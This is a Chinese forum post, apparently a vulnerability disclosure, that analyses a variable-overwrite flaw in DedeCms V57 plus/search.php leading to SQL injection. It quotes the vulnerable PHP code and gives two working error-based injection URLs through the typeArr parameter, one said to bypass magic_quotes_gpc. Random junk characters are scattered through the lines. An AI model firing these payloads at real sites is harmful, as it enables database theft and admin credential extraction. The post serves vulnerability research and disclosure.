找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2246|回复: 0
打印 上一主题 下一主题

DedeCms V57 plus/search.php文件SQL注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:18:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
8 E0 U5 w$ T" e. V作者: c4rp3nt3r@0x50sec.org
; x: J& A) |8 D" @% P7 d; Q* pDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.7 G3 O2 g6 h" f3 q3 T* q" F7 f

+ E0 y3 K' @' ~2 x2 ~5 _黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
- _2 j( r/ v; s  A
- z  o$ S. y. `/ T( \============
$ c* p2 ~- U/ A! O/ @" V 6 }; ^5 S& i- k9 s
# c3 |% ^, ?7 o1 O, x8 }% Z8 u( \
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.- f  b# F: K* t3 R+ t
" }, \- J0 v) e2 }" I$ W
require_once(dirname(__FILE__).”/../include/common.inc.php”);
1 t% u& t" j# l# s7 N  frequire_once(DEDEINC.”/arc.searchview.class.php”);
: ]: {# {+ D+ B( c 6 B! m. Z% s7 W/ B/ `
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;$ u* K5 Y+ U0 X; \* L1 m# y
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
0 X8 _& y7 x8 G6 j" I) M$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
9 q1 u6 _, J! ?" d$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
6 M9 o- n+ d( s6 m, f9 s$ h$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;: ^0 P9 k( C4 }

$ G; K" |- t2 p, s# O8 K5 L( d& vif(!isset($orderby)) $orderby=”;
; L- y0 e. A6 M/ r4 u$ x- oelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
0 E9 `1 G2 Y( U; I6 M& A 9 X3 f2 M# e$ b, G5 z) L

" U( [8 m& E0 ]; vif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
: l! y, L0 z) C: {  n5 W) R5 xelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);' S" \* V8 T+ P, v: v; b* Y: {

6 ]$ W0 f: O0 M" wif(!isset($keyword)){  t' H* s7 v. A1 F& f8 `0 h) u% k
    if(!isset($q)) $q = ”;
8 L) X0 @8 ~: y+ q" N    $keyword=$q;
7 K( ^( B# F$ A9 \- Z  m}% j0 a2 S% c1 |
1 h: o0 W5 A1 [
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
7 [: y/ m$ ]$ l" d" \2 v
, A, T9 ~, `; ~0 ~9 n) ]+ n: h//查找栏目信息
! b  b! u& o% P' k; O! n3 r6 w- Gif(empty($typeid))# }+ S' s3 _0 a; {
{
, n* Q2 X1 s, s2 f" g* ]6 y    $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;' a( B$ c& j8 F$ y
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
' U- J7 c$ H( I$ h    {
2 N& q: P* D  T$ A; I        $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);# \8 X# X2 S+ K* K: \$ ]
        fwrite($fp, “<”.”?php\r\n”);
9 n# E7 R( U. n# R" c& u        $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
6 ~* U. i$ j4 k! l/ N# ~        $dsql->Execute();; c! A% H/ R! `7 |3 }" V' Y+ o
        while($row = $dsql->GetArray())
" y7 D5 B  M" _0 w, H        {
( T( }8 _. \; X. ~4 B+ \            fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);1 `  Q3 [/ ?1 n1 `
        }
  x$ h: j# e5 V+ v        fwrite($fp, ‘?’.'>’);6 c) x- O+ c  d( ^0 o4 N
        fclose($fp);3 I% b4 `2 `4 W, O% U
    }2 \; U! E' R7 H7 |7 [* U
    //引入栏目缓存并看关键字是否有相关栏目内容, C2 [5 e% ?9 ^+ D
    require_once($typenameCacheFile);
; e/ S% J  D+ u' }; h. \//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个: g- M/ w, ^* x" n, \' @) c
//6 f4 l7 M5 D& J1 X! \( G
    if(isset($typeArr) && is_array($typeArr))
6 n1 n& f& c+ d' v0 O1 {    {
) m: {- J6 F, }( |        foreach($typeArr as $id=>$typename)
1 Y& z8 X. Q3 W! H( `' R- D3 [: G; r        {
# v( e; ~/ V9 i, H: ]: r% B( d % f$ v1 e9 z$ |: [) [, k
            <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font>  //这个地方要绕过
$ q" F" v7 k2 S$ t8 M0 b            if($keyword != $keywordn)! `/ D1 q2 C4 P$ S. [
            {
$ D  Y+ l; z* p, z; C+ a+ y6 i                $keyword = $keywordn;
$ k7 l) a* B2 J! u! w                <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
  V/ M5 a" b, c" h" `                break;
$ R* t% t6 G3 @, ?, N            }) X- J9 x8 V9 p+ Q8 I4 P' g
        }
5 ~7 S8 y. \- y0 C5 A$ u3 w9 H    }
1 j3 s( x2 ^9 n) @, _$ U: X}, \0 A- Y1 ]4 c/ F5 v: Z. h6 V
然后plus/search.php文件下面定义了一个 Search类的对象 ., x. w' u% y5 J
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.1 P& [* [6 r' Q7 K1 ?: \
$this->TypeLink = new TypeLink($typeid);
! O/ E3 q: }4 h" T3 M' w; M+ Y & z) w  [% K( }4 j9 t3 f! f+ f' ?
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.' B9 w0 T) m% Z" _. p1 b

0 c, T) I: w4 H% T$ z; L7 cclass TypeLink
; W" L" M! M4 d5 N. b{' R, O! z; a6 Z' x8 A  {
    var $typeDir;0 i; y) j* G. t7 P8 K  c' C" \5 A
    var $dsql;
+ e6 S7 Y' Y4 a, j    var $TypeID;
' W& ^$ P4 @7 W: u) K7 t    var $baseDir;
( ]8 {7 I% s, {* a# {    var $modDir;
5 x. _8 |2 z; x    var $indexUrl;6 s$ V9 a* v1 Z4 r) F, E% l
    var $indexName;' f; b/ H4 y! b: ~/ K
    var $TypeInfos;
/ W& Z/ x2 ?& Y2 U7 n    var $SplitSymbol;
5 `! ?$ h5 f: Q$ S! _- S& r; E2 K. n    var $valuePosition;
6 N0 y5 B7 x" Q. v    var $valuePositionName;% h% N! o8 v. K; p+ w
    var $OptionArrayList;//构造函数///////  u2 M6 s3 }  K. K5 ^
    //php5构造函数
# F# P% e5 G4 }    function __construct($typeid)
& o: l7 U! J3 R0 F5 x+ G, w! w    {- Z5 a9 ]" {/ ^5 H2 t3 a
        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
. ]( y8 e0 `2 y6 l5 O3 o        $this->indexName = $GLOBALS['cfg_indexname'];
+ |. M3 |: i: N: B+ T) {+ B) {4 k        $this->baseDir = $GLOBALS['cfg_basedir'];4 S4 o& ~, `( ]8 J& s
        $this->modDir = $GLOBALS['cfg_templets_dir'];
$ g" F' @2 L3 p6 p5 i4 R6 _4 T        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
: `+ i9 }' I  N+ s" x' e) y        $this->dsql = $GLOBALS['dsql'];
6 u4 w4 Q( [& B' b  a        $this->TypeID = $typeid;; m1 r. Y+ J" d+ Z& G
        $this->valuePosition = ”;" y: h1 L' H- {2 v- k& r$ z
        $this->valuePositionName = ”;
1 `  K- T0 t1 e  o3 }7 D. B- b        $this->typeDir = ”;) W8 F0 C% H- Q; q/ \8 Z
        $this->OptionArrayList = ”;; _$ [, T: p4 o% n

/ A9 d4 O8 b4 {- l; O$ \+ h        //载入类目信息1 F1 Y* p9 x. i1 t

" D) I$ u, r: r* C; j0 T" v        <font color=”Red”>$query = “SELECT tp.*,ch.typename as
* B- ~( N/ p( Z5 K( Y, }7 ]ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join  l( X& J- i6 o9 G: g4 b( G2 @
`#@__channeltype` ch
5 D" ?7 T# o" j# x* X        on ch.id=tp.channeltype  WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
& _; G, b; ?; o8 K1 P1 d( i9 @9 `
% t$ P; W( W5 n% ~        if($typeid > 0)/ l" @1 H/ }* L( p
        {" ?& T# F# U2 R0 @' {( d. p
            $this->TypeInfos = $this->dsql->GetOne($query);
  U, ]9 ^: E" d; q1 e利用代码一 需要 即使magic_quotes_gpc = Off
# \% p) e7 r' v1 |9 Y$ |
+ x+ D+ s) C4 D% `, r2 fwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
3 Y0 A  \. H: x* E" R0 K7 n
; I9 |: |1 B7 Q# e, p这只是其中一个利用代码… Search 类的构造函数再往下) j8 w9 G* t, _' N4 o5 o& P3 `' z

* C2 Z" `4 u3 Y% l, x" i% ]: H……省略
& z$ l) l! ^( j: ]7 i' ^! M# k# C$this->TypeID = $typeid;
( T* D  R9 r9 }1 p9 y, w……省略
3 ?- T3 [( C$ I3 c) dif($this->TypeID==”0″){+ r) D) M3 q& x1 B& |
            $this->ChannelTypeid=1;; m$ x4 s  a, i: ?8 H! H( m# K0 S
        }else{
" N2 ?6 k8 U' l6 d            $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲  W! y# a' @! w$ ]. J% f7 O) G. d
//现在不鸡肋了吧亲…& Q' \8 I( s2 E8 o$ N
            $this->ChannelTypeid=$row['channeltype'];
, h4 X0 e# P7 V1 D- D0 B - A/ D: k2 V) E/ M+ e
        }9 N' ]: J, T0 K/ Y- C# e
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.: G) l. q" U. G2 h9 C. D! d6 E7 ]
( ]" a( y4 O& l4 D* }
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title/ q- z! i2 v: z( @/ ^7 X3 z: l
7 p( E# y3 i. \# \, A* k
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
3 u/ S  a1 i$ F: b7 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表